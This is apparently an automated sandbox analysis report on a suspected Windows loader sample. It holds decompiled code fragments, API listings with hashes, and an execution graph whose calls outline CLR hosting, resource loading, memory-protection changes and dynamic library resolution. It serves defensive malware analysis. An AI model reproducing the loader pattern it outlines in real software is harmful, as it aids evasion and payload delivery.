                                                                                    0x00404ecd
                                                                                    0x00404e9d
                                                                                    0x00404e9d
                                                                                    0x00404ea0
                                                                                    0x00000000
                                                                                    0x00404ea2
                                                                                    0x00404eb4
                                                                                    0x00404eb4
                                                                                    0x00404ea0
                                                                                    0x00404eeb
                                                                                    0x00404eef
                                                                                    0x00404e7f
                                                                                    0x00404e97
                                                                                    0x00404e97
                                                                                    0x00404e7d

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction ID: 908501024bb7c2d4d9aded8cda733e96d04f0b6ba79867bc6ebe503863c54618
                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                    • Instruction Fuzzy Hash: 1F11877200014ABBCF165E85CC05CEE3F63BB99354B158926FF1865170D33AD971AB85
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00401F1C(intOrPtr _a4) {
                                                                                    				short _v516;
                                                                                    				short _v1028;
                                                                                    
                                                                                    				LoadStringW( *0x415f60, 0x179,  &_v516, 3);
                                                                                    				wsprintfW( &_v1028,  &_v516, _a4);
                                                                                    				LoadStringW( *0x415f60, 0x171,  &_v516, 6);
                                                                                    				return MessageBoxW( *0x415f64,  &_v1028,  &_v516, 0x33);
                                                                                    			}





                                                                                    0x00401f40
                                                                                    0x00401f53
                                                                                    0x00401f70
                                                                                    0x00401f90

                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000179,?,00000003), ref: 00401F40
                                                                                    • wsprintfW.USER32 ref: 00401F53
                                                                                    • LoadStringW.USER32(00000171,?,00000006), ref: 00401F70
                                                                                    • MessageBoxW.USER32(?,?,00000033), ref: 00401F88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$Messagewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3675432989-0
                                                                                    • Opcode ID: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                                                                                    • Instruction ID: f1b68f74e27ae39634cdf6190571022c2f1221254ce974dc298a2efd5b2adec8
                                                                                    • Opcode Fuzzy Hash: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                                                                                    • Instruction Fuzzy Hash: 08F01D7690021CBBEB119B50DC89FEA7B7DFB08304F0840B6BB08A60A1D6B15A55CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 77%
                                                                                    			E00402130() {
                                                                                    				struct tagRECT _v20;
                                                                                    				signed int _t7;
                                                                                    				signed int _t14;
                                                                                    				signed int _t20;
                                                                                    
                                                                                    				_t20 =  *0x415f78; // 0x0
                                                                                    				_t7 = 0 | _t20 == 0x00000000;
                                                                                    				 *0x415f78 = _t7;
                                                                                    				asm("sbb eax, eax");
                                                                                    				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t7 & 0x00000008);
                                                                                    				GetClientRect( *0x415f64,  &_v20);
                                                                                    				_t14 =  *0x415f78; // 0x0
                                                                                    				asm("sbb eax, eax");
                                                                                    				ShowWindow( *0x415f74,  ~_t14 & 0x00000005);
                                                                                    				E00401170(_v20.right, _v20.bottom);
                                                                                    				return E004010B6();
                                                                                    			}







                                                                                    0x00402138
                                                                                    0x0040213e
                                                                                    0x00402141
                                                                                    0x00402148
                                                                                    0x00402160
                                                                                    0x00402170
                                                                                    0x00402176
                                                                                    0x0040217d
                                                                                    0x00402189
                                                                                    0x00402195
                                                                                    0x004021a0

                                                                                    APIs
                                                                                    • GetMenu.USER32(00000205), ref: 00402159
                                                                                    • CheckMenuItem.USER32(00000000), ref: 00402160
                                                                                    • GetClientRect.USER32 ref: 00402170
                                                                                    • ShowWindow.USER32(00000000), ref: 00402189
                                                                                      • Part of subcall function 00401170: SendMessageW.USER32(00000005,00000000,00000000), ref: 0040118D
                                                                                      • Part of subcall function 00401170: GetWindowRect.USER32 ref: 0040119D
                                                                                      • Part of subcall function 00401170: SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000204), ref: 004011C0
                                                                                      • Part of subcall function 004010B6: SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                                                                                      • Part of subcall function 004010B6: SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                                                                                      • Part of subcall function 004010B6: SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                                                                                      • Part of subcall function 004010B6: swprintf.LIBCMT ref: 00401144
                                                                                      • Part of subcall function 004010B6: SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$MenuRect$CheckClientItemShowswprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2422921040-0
                                                                                    • Opcode ID: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                                                                                    • Instruction ID: 2110b4cd67f0e5a39b5caf6ff6ab68c74d55df39b8f184eadb547ce7c05df833
                                                                                    • Opcode Fuzzy Hash: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                                                                                    • Instruction Fuzzy Hash: 0FF0123159060AFFDB01BFB4ED4ECE93BB9E748305B048531F501D60B0EA7A85969B18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.2%
                                                                                    Dynamic/Decrypted Code Coverage:13.2%
                                                                                    Signature Coverage:1.2%
                                                                                    Total number of Nodes:666
                                                                                    Total number of Limit Nodes:23
                                                                                    execution_graph 12457 404a83 12470 407507 GetEnvironmentStringsW 12457->12470 12459 404a94 12460 404aa6 12459->12460 12461 404a9a 12459->12461 12483 404ad7 12460->12483 12477 40650b 12461->12477 12466 40650b __freea 14 API calls 12467 404aca 12466->12467 12468 40650b __freea 14 API calls 12467->12468 12469 404ad0 12468->12469 12471 407516 12470->12471 12472 407518 12470->12472 12471->12459 12505 407d48 12472->12505 12474 40752d __InternalCxxFrameHandler 12475 40650b __freea 14 API calls 12474->12475 12476 407547 FreeEnvironmentStringsW 12475->12476 12476->12459 12478 406516 HeapFree 12477->12478 12482 404aa0 12477->12482 12479 40652b GetLastError 12478->12479 12478->12482 12480 406538 __freea 12479->12480 12481 40649b ___std_exception_copy 12 API calls 12480->12481 12481->12482 12487 404af6 12483->12487 12484 4064ae _unexpected 14 API calls 12485 404b36 12484->12485 12486 404b3e 12485->12486 12493 404b48 12485->12493 12488 40650b __freea 14 API calls 12486->12488 12487->12484 12487->12487 12490 404aad 12488->12490 12489 404bbd 12491 40650b __freea 14 API calls 12489->12491 12490->12466 12491->12490 12492 4064ae _unexpected 14 API calls 12492->12493 12493->12489 12493->12492 12494 404bcd 12493->12494 12499 404be8 12493->12499 12501 40650b __freea 14 API calls 12493->12501 12726 4062e4 12493->12726 12735 404bf5 12494->12735 12498 40650b __freea 14 API calls 12502 404bdb 12498->12502 12741 4062b0 IsProcessorFeaturePresent 12499->12741 12501->12493 12504 40650b __freea 14 API calls 12502->12504 12503 404bf4 12504->12490 12506 407d86 12505->12506 12510 407d56 _unexpected 12505->12510 12515 40649b 12506->12515 12508 407d71 RtlAllocateHeap 12509 407d84 12508->12509 12508->12510 12509->12474 12510->12506 12510->12508 12512 4087b5 12510->12512 12518 4087e1 12512->12518 12529 405ee1 GetLastError 12515->12529 12517 4064a0 12517->12509 12519 4087ed __FrameHandler3::FrameUnwindToState 12518->12519 12524 407596 RtlEnterCriticalSection 12519->12524 12521 4087f8 __FrameHandler3::FrameUnwindToState 12525 40882f 12521->12525 12524->12521 12528 4075de RtlLeaveCriticalSection 12525->12528 12527 4087c0 12527->12510 12528->12527 12530 405efd 12529->12530 12531 405ef7 12529->12531 12535 405f01 SetLastError 12530->12535 12557 408520 12530->12557 12552 4084e1 12531->12552 12535->12517 12539 405f36 12541 408520 _unexpected 6 API calls 12539->12541 12540 405f47 12542 408520 _unexpected 6 API calls 12540->12542 12549 405f44 12541->12549 12543 405f53 12542->12543 12544 405f57 12543->12544 12545 405f6e 12543->12545 12546 408520 _unexpected 6 API calls 12544->12546 12569 405bbe 12545->12569 12546->12549 12547 40650b __freea 12 API calls 12547->12535 12549->12547 12551 40650b __freea 12 API calls 12551->12535 12574 40839e 12552->12574 12554 4084fd 12555 408506 12554->12555 12556 408518 TlsGetValue 12554->12556 12555->12530 12558 40839e _unexpected 5 API calls 12557->12558 12559 40853c 12558->12559 12560 405f19 12559->12560 12561 40855a TlsSetValue 12559->12561 12560->12535 12562 4064ae 12560->12562 12563 4064bb _unexpected 12562->12563 12564 4064fb 12563->12564 12565 4064e6 RtlAllocateHeap 12563->12565 12568 4087b5 _unexpected 2 API calls 12563->12568 12566 40649b ___std_exception_copy 13 API calls 12564->12566 12565->12563 12567 405f2e 12565->12567 12566->12567 12567->12539 12567->12540 12568->12563 12588 405a52 12569->12588 12575 4083ce 12574->12575 12579 4083ca _com_raise_error 12574->12579 12575->12579 12580 4082d3 12575->12580 12578 4083e8 GetProcAddress 12578->12579 12579->12554 12586 4082e4 ___vcrt_FlsSetValue 12580->12586 12581 40837a 12581->12578 12581->12579 12582 408302 LoadLibraryExW 12583 408381 12582->12583 12584 40831d GetLastError 12582->12584 12583->12581 12585 408393 FreeLibrary 12583->12585 12584->12586 12585->12581 12586->12581 12586->12582 12587 408350 LoadLibraryExW 12586->12587 12587->12583 12587->12586 12589 405a5e __FrameHandler3::FrameUnwindToState 12588->12589 12602 407596 RtlEnterCriticalSection 12589->12602 12591 405a68 12603 405a98 12591->12603 12594 405b64 12595 405b70 __FrameHandler3::FrameUnwindToState 12594->12595 12607 407596 RtlEnterCriticalSection 12595->12607 12597 405b7a 12608 405d45 12597->12608 12599 405b92 12612 405bb2 12599->12612 12602->12591 12606 4075de RtlLeaveCriticalSection 12603->12606 12605 405a86 12605->12594 12606->12605 12607->12597 12609 405d54 _unexpected 12608->12609 12610 405d7b _unexpected 12608->12610 12609->12610 12615 407f82 12609->12615 12610->12599 12725 4075de RtlLeaveCriticalSection 12612->12725 12614 405ba0 12614->12551 12617 408002 12615->12617 12618 407f98 12615->12618 12619 40650b __freea 14 API calls 12617->12619 12641 408050 12617->12641 12618->12617 12623 407fcb 12618->12623 12625 40650b __freea 14 API calls 12618->12625 12620 408024 12619->12620 12621 40650b __freea 14 API calls 12620->12621 12622 408037 12621->12622 12627 40650b __freea 14 API calls 12622->12627 12628 40650b __freea 14 API calls 12623->12628 12642 407fed 12623->12642 12624 40650b __freea 14 API calls 12629 407ff7 12624->12629 12631 407fc0 12625->12631 12626 40805e 12630 4080be 12626->12630 12637 40650b 14 API calls __freea 12626->12637 12632 408045 12627->12632 12633 407fe2 12628->12633 12634 40650b __freea 14 API calls 12629->12634 12635 40650b __freea 14 API calls 12630->12635 12643 407ad8 12631->12643 12638 40650b __freea 14 API calls 12632->12638 12671 407bd6 12633->12671 12634->12617 12640 4080c4 12635->12640 12637->12626 12638->12641 12640->12610 12683 4080f3 12641->12683 12642->12624 12644 407bd2 12643->12644 12645 407ae9 12643->12645 12644->12623 12646 407afa 12645->12646 12647 40650b __freea 14 API calls 12645->12647 12648 407b0c 12646->12648 12649 40650b __freea 14 API calls 12646->12649 12647->12646 12650 407b1e 12648->12650 12652 40650b __freea 14 API calls 12648->12652 12649->12648 12651 407b30 12650->12651 12653 40650b __freea 14 API calls 12650->12653 12654 407b42 12651->12654 12655 40650b __freea 14 API calls 12651->12655 12652->12650 12653->12651 12656 407b54 12654->12656 12657 40650b __freea 14 API calls 12654->12657 12655->12654 12658 407b66 12656->12658 12660 40650b __freea 14 API calls 12656->12660 12657->12656 12659 407b78 12658->12659 12661 40650b __freea 14 API calls 12658->12661 12662 407b8a 12659->12662 12663 40650b __freea 14 API calls 12659->12663 12660->12658 12661->12659 12664 407b9c 12662->12664 12665 40650b __freea 14 API calls 12662->12665 12663->12662 12666 407bae 12664->12666 12668 40650b __freea 14 API calls 12664->12668 12665->12664 12667 407bc0 12666->12667 12669 40650b __freea 14 API calls 12666->12669 12667->12644 12670 40650b __freea 14 API calls 12667->12670 12668->12666 12669->12667 12670->12644 12672 407be3 12671->12672 12682 407c3b 12671->12682 12673 407bf3 12672->12673 12674 40650b __freea 14 API calls 12672->12674 12675 40650b __freea 14 API calls 12673->12675 12678 407c05 12673->12678 12674->12673 12675->12678 12676 40650b __freea 14 API calls 12679 407c17 12676->12679 12677 407c29 12681 40650b __freea 14 API calls 12677->12681 12677->12682 12678->12676 12678->12679 12679->12677 12680 40650b __freea 14 API calls 12679->12680 12680->12677 12681->12682 12682->12642 12684 408100 12683->12684 12688 40811f 12683->12688 12684->12688 12689 407c64 12684->12689 12687 40650b __freea 14 API calls 12687->12688 12688->12626 12690 407d42 12689->12690 12691 407c75 12689->12691 12690->12687 12692 407c3f _unexpected 14 API calls 12691->12692 12693 407c7d 12692->12693 12694 407c3f _unexpected 14 API calls 12693->12694 12695 407c88 12694->12695 12696 407c3f _unexpected 14 API calls 12695->12696 12697 407c93 12696->12697 12698 407c3f _unexpected 14 API calls 12697->12698 12699 407c9e 12698->12699 12700 407c3f _unexpected 14 API calls 12699->12700 12701 407cac 12700->12701 12702 40650b __freea 14 API calls 12701->12702 12703 407cb7 12702->12703 12704 40650b __freea 14 API calls 12703->12704 12705 407cc2 12704->12705 12706 40650b __freea 14 API calls 12705->12706 12707 407ccd 12706->12707 12708 407c3f _unexpected 14 API calls 12707->12708 12709 407cdb 12708->12709 12710 407c3f _unexpected 14 API calls 12709->12710 12711 407ce9 12710->12711 12712 407c3f _unexpected 14 API calls 12711->12712 12713 407cfa 12712->12713 12714 407c3f _unexpected 14 API calls 12713->12714 12715 407d08 12714->12715 12716 407c3f _unexpected 14 API calls 12715->12716 12717 407d16 12716->12717 12718 40650b __freea 14 API calls 12717->12718 12719 407d21 12718->12719 12720 40650b __freea 14 API calls 12719->12720 12721 407d2c 12720->12721 12722 40650b __freea 14 API calls 12721->12722 12723 407d37 12722->12723 12724 40650b __freea 14 API calls 12723->12724 12724->12690 12725->12614 12727 4062f2 12726->12727 12728 406300 12726->12728 12727->12728 12733 40631a 12727->12733 12729 40649b ___std_exception_copy 14 API calls 12728->12729 12730 40630a 12729->12730 12745 4062a0 12730->12745 12732 406314 12732->12493 12733->12732 12734 40649b ___std_exception_copy 14 API calls 12733->12734 12734->12730 12736 404bd3 12735->12736 12737 404c02 12735->12737 12736->12498 12738 404c19 12737->12738 12739 40650b __freea 14 API calls 12737->12739 12740 40650b __freea 14 API calls 12738->12740 12739->12737 12740->12736 12742 4062bc 12741->12742 12743 4060a4 __FrameHandler3::FrameUnwindToState 8 API calls 12742->12743 12744 4062d1 GetCurrentProcess TerminateProcess 12743->12744 12744->12503 12748 4061ec 12745->12748 12749 4061fe ___std_exception_copy 12748->12749 12754 406223 12749->12754 12751 406216 12765 405850 12751->12765 12755 406233 12754->12755 12756 40623a 12754->12756 12771 405890 GetLastError 12755->12771 12761 406248 12756->12761 12775 40607b 12756->12775 12759 40626f 12760 4062b0 ___std_exception_copy 11 API calls 12759->12760 12759->12761 12762 40629f 12760->12762 12761->12751 12763 4061ec ___std_exception_copy 41 API calls 12762->12763 12764 4062ac 12763->12764 12764->12751 12767 40585c 12765->12767 12766 405873 12769 405886 12766->12769 12770 4058e0 ___std_exception_copy 41 API calls 12766->12770 12767->12766 12800 4058e0 12767->12800 12769->12732 12770->12769 12772 4058a9 12771->12772 12778 405f92 12772->12778 12776 406086 GetLastError SetLastError 12775->12776 12777 40609f 12775->12777 12776->12759 12777->12759 12779 405fa5 12778->12779 12780 405fab 12778->12780 12781 4084e1 _unexpected 6 API calls 12779->12781 12782 408520 _unexpected 6 API calls 12780->12782 12799 4058c5 SetLastError 12780->12799 12781->12780 12783 405fc5 12782->12783 12784 4064ae _unexpected 14 API calls 12783->12784 12783->12799 12785 405fd5 12784->12785 12786 405ff2 12785->12786 12787 405fdd 12785->12787 12788 408520 _unexpected 6 API calls 12786->12788 12789 408520 _unexpected 6 API calls 12787->12789 12790 405ffe 12788->12790 12791 405fe9 12789->12791 12792 406011 12790->12792 12793 406002 12790->12793 12794 40650b __freea 14 API calls 12791->12794 12796 405bbe _unexpected 14 API calls 12792->12796 12795 408520 _unexpected 6 API calls 12793->12795 12794->12799 12795->12791 12797 40601c 12796->12797 12798 40650b __freea 14 API calls 12797->12798 12798->12799 12799->12756 12801 4058ee GetLastError 12800->12801 12802 40592f 12800->12802 12803 4058fd 12801->12803 12802->12766 12804 405f92 ___std_exception_copy 14 API calls 12803->12804 12805 40591a SetLastError 12804->12805 12805->12802 12806 405936 12805->12806 12809 40579a 12806->12809 12820 40890a 12809->12820 12812 4057aa 12814 4057b4 IsProcessorFeaturePresent 12812->12814 12815 4057d3 12812->12815 12816 4057c0 12814->12816 12856 405033 12815->12856 12850 4060a4 12816->12850 12859 408838 12820->12859 12823 40894f 12826 40895b __FrameHandler3::FrameUnwindToState 12823->12826 12824 405ee1 ___std_exception_copy 14 API calls 12832 40898c __FrameHandler3::FrameUnwindToState 12824->12832 12825 4089ab 12828 40649b ___std_exception_copy 14 API calls 12825->12828 12826->12824 12826->12825 12827 4089bd __FrameHandler3::FrameUnwindToState 12826->12827 12826->12832 12829 4089f3 __FrameHandler3::FrameUnwindToState 12827->12829 12869 407596 RtlEnterCriticalSection 12827->12869 12830 4089b0 12828->12830 12835 408a30 12829->12835 12836 408b2d 12829->12836 12846 408a5e 12829->12846 12833 4062a0 ___std_exception_copy 41 API calls 12830->12833 12832->12825 12832->12827 12849 408995 12832->12849 12833->12849 12835->12846 12870 405d90 GetLastError 12835->12870 12837 408b38 12836->12837 12901 4075de RtlLeaveCriticalSection 12836->12901 12840 405033 __FrameHandler3::FrameUnwindToState 21 API calls 12837->12840 12842 408b40 12840->12842 12843 405d90 _unexpected 41 API calls 12847 408ab3 12843->12847 12845 405d90 _unexpected 41 API calls 12845->12846 12897 408ad9 12846->12897 12848 405d90 _unexpected 41 API calls 12847->12848 12847->12849 12848->12849 12849->12812 12851 4060c0 _com_raise_error 12850->12851 12852 4060ec IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12851->12852 12854 4061bd _com_raise_error 12852->12854 12903 4018d4 12854->12903 12855 4061db 12855->12815 12911 404ea3 12856->12911 12860 408844 __FrameHandler3::FrameUnwindToState 12859->12860 12865 407596 RtlEnterCriticalSection 12860->12865 12862 408852 12866 408894 12862->12866 12865->12862 12867 4075de __FrameHandler3::FrameUnwindToState RtlLeaveCriticalSection 12866->12867 12868 40579f 12867->12868 12868->12812 12868->12823 12869->12829 12871 405dac 12870->12871 12872 405da6 12870->12872 12874 408520 _unexpected 6 API calls 12871->12874 12876 405db0 SetLastError 12871->12876 12873 4084e1 _unexpected 6 API calls 12872->12873 12873->12871 12875 405dc8 12874->12875 12875->12876 12878 4064ae _unexpected 14 API calls 12875->12878 12880 405e40 12876->12880 12881 405e45 12876->12881 12879 405ddd 12878->12879 12883 405de5 12879->12883 12884 405df6 12879->12884 12880->12845 12882 40579a __FrameHandler3::FrameUnwindToState 39 API calls 12881->12882 12885 405e4a 12882->12885 12886 408520 _unexpected 6 API calls 12883->12886 12887 408520 _unexpected 6 API calls 12884->12887 12889 405df3 12886->12889 12888 405e02 12887->12888 12890 405e06 12888->12890 12891 405e1d 12888->12891 12893 40650b __freea 14 API calls 12889->12893 12892 408520 _unexpected 6 API calls 12890->12892 12894 405bbe _unexpected 14 API calls 12891->12894 12892->12889 12893->12876 12895 405e28 12894->12895 12896 40650b __freea 14 API calls 12895->12896 12896->12876 12898 408aa5 12897->12898 12899 408add 12897->12899 12898->12843 12898->12847 12898->12849 12902 4075de RtlLeaveCriticalSection 12899->12902 12901->12837 12902->12898 12904 4018dc 12903->12904 12905 4018dd IsProcessorFeaturePresent 12903->12905 12904->12855 12907 401f67 12905->12907 12910 401f2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12907->12910 12909 40204a 12909->12855 12910->12909 12912 404ed0 12911->12912 12921 404ee1 12911->12921 12922 401dd4 GetModuleHandleW 12912->12922 12916 404f1f 12929 404d53 12921->12929 12923 401de0 12922->12923 12923->12921 12924 404f84 GetModuleHandleExW 12923->12924 12925 404fc3 GetProcAddress 12924->12925 12926 404fd7 12924->12926 12925->12926 12927 404ff3 12926->12927 12928 404fea FreeLibrary 12926->12928 12927->12921 12928->12927 12930 404d5f __FrameHandler3::FrameUnwindToState 12929->12930 12931 407596 __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 12930->12931 12932 404d69 12931->12932 12933 404dbb __FrameHandler3::FrameUnwindToState 14 API calls 12932->12933 12934 404d76 12933->12934 12935 404d94 __FrameHandler3::FrameUnwindToState RtlLeaveCriticalSection 12934->12935 12936 404d82 12935->12936 12936->12916 12937 404f3a 12936->12937 12938 404f6b __FrameHandler3::FrameUnwindToState 5 API calls 12937->12938 12939 404f44 12938->12939 12940 404f58 12939->12940 12941 404f48 GetCurrentProcess TerminateProcess 12939->12941 12942 404f84 __FrameHandler3::FrameUnwindToState GetModuleHandleExW GetProcAddress FreeLibrary 12940->12942 12941->12940 12943 404f60 ExitProcess 12942->12943 12979 44d450 12980 44d468 12979->12980 12981 44d5c7 VirtualProtect VirtualProtect 12980->12981 12982 44d582 LoadLibraryA 12980->12982 12984 44d5fb 12981->12984 12983 44d599 12982->12983 12983->12980 12985 44d5ab GetProcAddress 12983->12985 12984->12984 12985->12983 12986 44d5c1 ExitProcess 12985->12986 12944 a6bd00 DuplicateHandle 12945 a6bd96 12944->12945 12946 a6fe40 SetWindowLongW 12947 a6feac 12946->12947 12987 a692f0 12990 a693e8 12987->12990 12988 a692ff 12991 a693fb 12990->12991 12993 a69413 12991->12993 12997 a69670 12991->12997 12992 a6940b 12992->12993 12994 a69610 GetModuleHandleW 12992->12994 12993->12988 12995 a6963d 12994->12995 12995->12988 12998 a69684 12997->12998 13000 a696a9 12998->13000 13001 a68768 12998->13001 13000->12992 13002 a69850 LoadLibraryExW 13001->13002 13004 a698c9 13002->13004 13004->13000 13005 a6b6d0 GetCurrentProcess 13006 a6b743 13005->13006 13007 a6b74a GetCurrentThread 13005->13007 13006->13007 13008 a6b787 GetCurrentProcess 13007->13008 13009 a6b780 13007->13009 13010 a6b7bd 13008->13010 13009->13008 13011 a6b7e5 GetCurrentThreadId 13010->13011 13012 a6b816 13011->13012 12948 401708 12953 401e16 SetUnhandledExceptionFilter 12948->12953 12950 40170d _com_raise_error 12954 4051cb 12950->12954 12952 401718 12953->12950 12955 4051f1 12954->12955 12956 4051d7 12954->12956 12955->12952 12956->12955 12957 40649b ___std_exception_copy 14 API calls 12956->12957 12958 4051e1 12957->12958 12959 4062a0 ___std_exception_copy 41 API calls 12958->12959 12960 4051ec 12959->12960 12960->12952 12961 400fe9 12962 400fec CLRCreateInstance 12961->12962 12964 401047 SafeArrayCreate 12962->12964 12966 401134 SafeArrayAccessData 12964->12966 12967 401149 __InternalCxxFrameHandler 12966->12967 12968 401157 SafeArrayUnaccessData 12967->12968 12969 40116c 12968->12969 12970 4011ea GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 12969->12970 12971 401213 12970->12971 12974 401280 12970->12974 12972 40124a SafeArrayCreateVector SafeArrayPutElement 12971->12972 12973 40121d SysAllocString SafeArrayPutElement 12971->12973 12972->12974 12973->12971 12973->12974 12975 4012b7 SafeArrayDestroy 12974->12975 12976 4012be 12974->12976 12975->12976 12977 4012c2 SafeArrayDestroy 12976->12977 12978 4012c9 12976->12978 12977->12978 13013 40171a 13014 401726 __FrameHandler3::FrameUnwindToState 13013->13014 13041 401992 13014->13041 13016 40172d 13017 401880 13016->13017 13028 401757 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 13016->13028 13069 401c83 IsProcessorFeaturePresent 13017->13069 13019 401887 13073 40506f 13019->13073 13022 405033 __FrameHandler3::FrameUnwindToState 21 API calls 13023 401895 13022->13023 13076 401bba 13023->13076 13025 401776 13028->13025 13031 4017f7 13028->13031 13062 405049 13028->13062 13029 4017fd 13056 40147b GetModuleHandleW FindResourceW 13029->13056 13052 401d9e 13031->13052 13042 40199b 13041->13042 13080 40207b IsProcessorFeaturePresent 13042->13080 13046 4019ac 13051 4019b0 13046->13051 13090 40563d 13046->13090 13049 4019c7 13049->13016 13051->13016 13215 402470 13052->13215 13054 401db1 GetStartupInfoW 13055 401dc4 13054->13055 13055->13029 13057 40149d GetModuleHandleW LoadResource 13056->13057 13058 4014de ExitProcess 13056->13058 13059 4014d7 FreeResource 13057->13059 13060 4014af LockResource GetModuleHandleW SizeofResource 13057->13060 13059->13058 13060->13059 13061 4014cc 13060->13061 13061->13059 13063 4056de __FrameHandler3::FrameUnwindToState 13062->13063 13064 40505f _com_raise_error 13062->13064 13065 405d90 _unexpected 41 API calls 13063->13065 13064->13031 13066 4056ef 13065->13066 13067 40579a __FrameHandler3::FrameUnwindToState 41 API calls 13066->13067 13068 405719 13067->13068 13070 401c99 _com_raise_error 13069->13070 13071 401d44 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13070->13071 13072 401d8f _com_raise_error 13071->13072 13072->13019 13074 404ea3 __FrameHandler3::FrameUnwindToState 21 API calls 13073->13074 13075 40188d 13074->13075 13075->13022 13077 401bd0 13076->13077 13079 40189b __scrt_common_main_seh 13077->13079 13217 401b6d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 13077->13217 13081 4019a7 13080->13081 13082 4025ca 13081->13082 13099 402aa1 13082->13099 13085 4025d3 13085->13046 13087 4025db 13088 4025e6 13087->13088 13113 402add 13087->13113 13088->13046 13153 40870d 13090->13153 13093 4025e9 13094 4025f2 13093->13094 13095 4025fc 13093->13095 13096 402a86 ___vcrt_uninitialize_ptd 6 API calls 13094->13096 13095->13051 13097 4025f7 13096->13097 13098 402add ___vcrt_uninitialize_locks RtlDeleteCriticalSection 13097->13098 13098->13095 13100 402aaa 13099->13100 13102 402ad3 13100->13102 13104 4025cf 13100->13104 13117 402d1d 13100->13117 13103 402add ___vcrt_uninitialize_locks RtlDeleteCriticalSection 13102->13103 13103->13104 13104->13085 13105 402a53 13104->13105 13134 402c2e 13105->13134 13108 402a68 13108->13087 13111 402a83 13111->13087 13114 402b07 13113->13114 13115 402ae8 13113->13115 13114->13085 13116 402af2 RtlDeleteCriticalSection 13115->13116 13116->13114 13116->13116 13122 402b43 13117->13122 13120 402d55 InitializeCriticalSectionAndSpinCount 13121 402d40 13120->13121 13121->13100 13123 402b60 13122->13123 13126 402b64 13122->13126 13123->13120 13123->13121 13124 402bcc GetProcAddress 13124->13123 13126->13123 13126->13124 13127 402bbd 13126->13127 13129 402be3 LoadLibraryExW 13126->13129 13127->13124 13128 402bc5 FreeLibrary 13127->13128 13128->13124 13130 402bfa GetLastError 13129->13130 13131 402c2a 13129->13131 13130->13131 13132 402c05 ___vcrt_FlsSetValue 13130->13132 13131->13126 13132->13131 13133 402c1b LoadLibraryExW 13132->13133 13133->13126 13135 402b43 ___vcrt_FlsSetValue 5 API calls 13134->13135 13136 402c48 13135->13136 13137 402c61 TlsAlloc 13136->13137 13138 402a5d 13136->13138 13138->13108 13139 402cdf 13138->13139 13140 402b43 ___vcrt_FlsSetValue 5 API calls 13139->13140 13141 402cf9 13140->13141 13142 402d14 TlsSetValue 13141->13142 13143 402a76 13141->13143 13142->13143 13143->13111 13144 402a86 13143->13144 13145 402a90 13144->13145 13146 402a96 13144->13146 13148 402c69 13145->13148 13146->13108 13149 402b43 ___vcrt_FlsSetValue 5 API calls 13148->13149 13150 402c83 